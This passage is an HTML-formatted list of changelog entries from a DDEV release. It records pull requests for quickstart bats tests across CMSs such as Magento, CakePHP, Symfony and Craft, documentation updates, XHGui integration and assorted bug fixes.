<li>test: Add quickstart test for magento2 (by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rpkoller/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rpkoller">@rpkoller</a>) [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2918940304" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7082" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7082/hovercard" href="https://github.com/ddev/ddev/pull/7082">#7082</a></li>
<li>test: Disable link check on freedesktop.org since it will be out for a week by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2923207366" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7100" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7100/hovercard" href="https://github.com/ddev/ddev/pull/7100">#7100</a></li>
<li>docs: add Wordpress special handling info about wp-cli.yml by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nickchomey/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nickchomey">@nickchomey</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2918705956" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7080" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7080/hovercard" href="https://github.com/ddev/ddev/pull/7080">#7080</a></li>
<li>docs: add DevDb tip to database management documentation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/damms005/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/damms005">@damms005</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2919875466" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7084" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7084/hovercard" href="https://github.com/ddev/ddev/pull/7084">#7084</a></li>
<li>docs: update Windows installation docs to use 'Docker Engine' terminology by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nick-Hope/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nick-Hope">@Nick-Hope</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2921781585" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7092" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7092/hovercard" href="https://github.com/ddev/ddev/pull/7092">#7092</a></li>
<li>fix: use filepath for calculateHostUploadDirFullPath, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2910964061" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7065" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7065/hovercard" href="https://github.com/ddev/ddev/issues/7065">#7065</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2912465334" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7066" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7066/hovercard" href="https://github.com/ddev/ddev/pull/7066">#7066</a></li>
<li>test: simplify the zip based test and quickstart for backdrop based on feedback from <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rpkoller/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rpkoller">@rpkoller</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2925024940" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7106" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7106/hovercard" href="https://github.com/ddev/ddev/pull/7106">#7106</a></li>
<li>test: use a more robust approach downloading the latest zip file (by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a>) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rpkoller/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rpkoller">@rpkoller</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2924915077" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7104" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7104/hovercard" href="https://github.com/ddev/ddev/pull/7104">#7104</a></li>
<li>test: Bats test for CakePHP composer quickstart by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rpkoller/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rpkoller">@rpkoller</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2923408905" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7103" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7103/hovercard" href="https://github.com/ddev/ddev/pull/7103">#7103</a></li>
<li>test: bats tests for expression engine and adjustments to its quickstart by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rpkoller/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rpkoller">@rpkoller</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2923236029" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7101" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7101/hovercard" href="https://github.com/ddev/ddev/pull/7101">#7101</a></li>
<li>test: adding kirby quickstart bats test by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rpkoller/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rpkoller">@rpkoller</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2923175418" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7099" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7099/hovercard" href="https://github.com/ddev/ddev/pull/7099">#7099</a></li>
<li>fix: remove obsolete references to non-traefik router by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2923103239" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7096" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7096/hovercard" href="https://github.com/ddev/ddev/pull/7096">#7096</a></li>
<li>fix: add ddev_nointeractive to common-setup.bash (per <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a>) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rpkoller/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rpkoller">@rpkoller</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2926865151" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7115" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7115/hovercard" href="https://github.com/ddev/ddev/pull/7115">#7115</a></li>
<li>test: attempt to fix the returned 503 error on ee tests [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rpkoller/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rpkoller">@rpkoller</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2926771981" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7114" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7114/hovercard" href="https://github.com/ddev/ddev/pull/7114">#7114</a></li>
<li>test: symfony bats tests by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rpkoller/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rpkoller">@rpkoller</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2923396031" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7102" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7102/hovercard" href="https://github.com/ddev/ddev/pull/7102">#7102</a></li>
<li>docs: Update quickstart.md to remove Drupal CMS zip file instructions by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/phenaproxima/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/phenaproxima">@phenaproxima</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2929100589" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7119" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7119/hovercard" href="https://github.com/ddev/ddev/pull/7119">#7119</a></li>
<li>test: adding silverstripe quickstart bats test by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rpkoller/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rpkoller">@rpkoller</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2926609632" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7112" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7112/hovercard" href="https://github.com/ddev/ddev/pull/7112">#7112</a></li>
<li>test: craftcms bats test by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rpkoller/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rpkoller">@rpkoller</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2925397626" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7107" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7107/hovercard" href="https://github.com/ddev/ddev/pull/7107">#7107</a></li>
<li>docs: ddev debug rebuild is great for debugging [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2929851487" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7120" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7120/hovercard" href="https://github.com/ddev/ddev/pull/7120">#7120</a></li>
<li>test: bats test for Statamic Composer quickstart [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rpkoller/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rpkoller">@rpkoller</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2926923962" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7116" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7116/hovercard" href="https://github.com/ddev/ddev/pull/7116">#7116</a></li>
<li>test: add OpenMage/Magento 1 quickstart test and split it from Magento 2, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2922600563" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7094" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7094/hovercard" href="https://github.com/ddev/ddev/issues/7094">#7094</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sreichel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sreichel">@sreichel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2921349142" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7091" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7091/hovercard" href="https://github.com/ddev/ddev/pull/7091">#7091</a></li>
<li>feat: show config.<em>.y</em>ml on ddev start by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hanoii/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hanoii">@hanoii</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2920643809" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7089" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7089/hovercard" href="https://github.com/ddev/ddev/pull/7089">#7089</a></li>
<li>fix: make linkspector ignorePatterns work properly, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2824162450" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6951" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/6951/hovercard" href="https://github.com/ddev/ddev/pull/6951">#6951</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2933003120" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7125" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7125/hovercard" href="https://github.com/ddev/ddev/pull/7125">#7125</a></li>
<li>docs: Add docs about configuring browser for HTTPS certificates by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MurzNN/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MurzNN">@MurzNN</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2916022009" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7075" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7075/hovercard" href="https://github.com/ddev/ddev/pull/7075">#7075</a></li>
<li>test: adjust openmage bats test assertions to the now available demo content by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rpkoller/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rpkoller">@rpkoller</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2933235017" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7126" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7126/hovercard" href="https://github.com/ddev/ddev/pull/7126">#7126</a></li>
<li>build: remove go toolchain, bump docker library to 28.0.2, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2901680865" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7057" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7057/hovercard" href="https://github.com/ddev/ddev/pull/7057">#7057</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2934666899" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7127" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7127/hovercard" href="https://github.com/ddev/ddev/pull/7127">#7127</a></li>
<li>test: improve <code>ddev debug test</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2935166801" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7128" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7128/hovercard" href="https://github.com/ddev/ddev/pull/7128">#7128</a></li>
<li>docs: ignore mutagen links in linkspector by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2935627217" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7129" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7129/hovercard" href="https://github.com/ddev/ddev/pull/7129">#7129</a></li>
<li>docs: fix example file name by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2938622133" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7130" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7130/hovercard" href="https://github.com/ddev/ddev/pull/7130">#7130</a></li>
<li>fix: sanitize <code>~/.ddev/project_list.yaml</code>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2939421963" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7132" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7132/hovercard" href="https://github.com/ddev/ddev/issues/7132">#7132</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2941099119" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7136" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7136/hovercard" href="https://github.com/ddev/ddev/pull/7136">#7136</a></li>
<li>fix: set <code>NO_PROXY=*</code> in ddev-router to allow internal connections, use default Traefik config file location by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2928427503" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7118" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7118/hovercard" href="https://github.com/ddev/ddev/pull/7118">#7118</a></li>
<li>feat: Integrate XHGui into DDEV, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2784687344" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6894" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/6894/hovercard" href="https://github.com/ddev/ddev/issues/6894">#6894</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2914426090" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7069" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7069/hovercard" href="https://github.com/ddev/ddev/pull/7069">#7069</a></li>
<li>refactor: remove solrtail from installed example commands, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2943626479" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7139" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7139/hovercard" href="https://github.com/ddev/ddev/issues/7139">#7139</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shelane/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shelane">@shelane</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2943672044" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7140" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7140/hovercard" href="https://github.com/ddev/ddev/pull/7140">#7140</a></li>
<li>fix: don't override <code>generic</code> type in <code>ddev config --update</code>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2887138002" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7035" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7035/hovercard" href="https://github.com/ddev/ddev/issues/7035">#7035</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2943122860" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7137" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7137/hovercard" href="https://github.com/ddev/ddev/pull/7137">#7137</a></li>
<li>build: migrate golangci-lint to v2, bump golangci/golangci-lint-action from 6 to 7 by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2943795465" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7141" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7141/hovercard" href="https://github.com/ddev/ddev/pull/7141">#7141</a></li>
<li>fix: reload app hooks after uninstalling ddev-xhgui add-on, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2946884700" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7144" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7144/hovercard" href="https://github.com/ddev/ddev/issues/7144">#7144</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2947042748" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7145" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7145/hovercard" href="https://github.com/ddev/ddev/pull/7145">#7145</a></li>
<li>fix: make <code>DDEV_PAGER</code> optional, update docs for <code>PAGER</code>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2884770540" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7032" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7032/hovercard" href="https://github.com/ddev/ddev/issues/7032">#7032</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2943292160" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7138" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7138/hovercard" href="https://github.com/ddev/ddev/pull/7138">#7138</a></li>
<li>fix: db warning on <code>config --update</code> should only be shown for default db type by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2946820935" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7143" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7143/hovercard" href="https://github.com/ddev/ddev/pull/7143">#7143</a></li>
<li>fix: remove XHGui volume for <code>/run/nginx</code>, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2914426090" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7069" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7069/hovercard" href="https://github.com/ddev/ddev/pull/7069">#7069</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2945918094" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7142" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7142/hovercard" href="https://github.com/ddev/ddev/pull/7142">#7142</a></li>
<li>fix: don't auto show release notes in windows installer, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2897793508" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7049" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7049/hovercard" href="https://github.com/ddev/ddev/pull/7049">#7049</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2947913241" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7147" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7147/hovercard" href="https://github.com/ddev/ddev/pull/7147">#7147</a></li>
<li>feat: add MutagenSync annotation for custom commands, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2900874577" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7053" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7053/hovercard" href="https://github.com/ddev/ddev/pull/7053">#7053</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2932732956" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7124" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7124/hovercard" href="https://github.com/ddev/ddev/pull/7124">#7124</a></li>
<li>docs: Add the xhgui container to the building and contributing page. Add more description to the xhprof profiling page. by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PierrePaul/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PierrePaul">@PierrePaul</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2958897102" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7168" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7168/hovercard" href="https://github.com/ddev/ddev/pull/7168">#7168</a></li>
<li>fix: use <code>charset=utf8mb4</code> in DATABASE_URL for Symfony environment variables, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2914068614" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7068" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7068/hovercard" href="https://github.com/ddev/ddev/issues/7068">#7068</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RubenColpaert/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RubenColpaert">@RubenColpaert</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2916743723" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7076" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7076/hovercard" href="https://github.com/ddev/ddev/pull/7076">#7076</a></li>
<li>fix: correct status color formatting in <code>ddev describe</code> and <code>ddev list</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2955657306" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7158" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7158/hovercard" href="https://github.com/ddev/ddev/pull/7158">#7158</a></li>
<li>fix: use correct autoloader for XHGui php-profiler, preinstall it in ddev-webserver, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2958932300" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7170" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7170/hovercard" href="https://github.com/ddev/ddev/issues/7170">#7170</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2960156327" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7172" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7172/hovercard" href="https://github.com/ddev/ddev/pull/7172">#7172</a></li>
